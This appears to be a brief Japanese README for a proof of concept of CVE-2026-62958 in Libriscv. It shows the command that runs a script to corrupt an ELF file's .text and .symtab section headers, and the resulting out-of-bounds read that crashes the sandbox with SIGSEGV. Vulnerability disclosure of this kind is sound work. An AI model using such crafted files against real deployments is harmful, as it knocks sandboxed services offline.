
CVE-2026-62958の概念実証: 不正なELFを生成してLibriscvの範囲外読み取りを引き起こし、SIGSEGVでサンドボックスをクラッシュさせます。
Libriscv の脆弱性により、攻撃者は境界外読み取りを使用してサンドボックスをクラッシュさせることができます。
Bad elf を作成するには:
python3 poc.py samplefile poisoned_file
結果:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)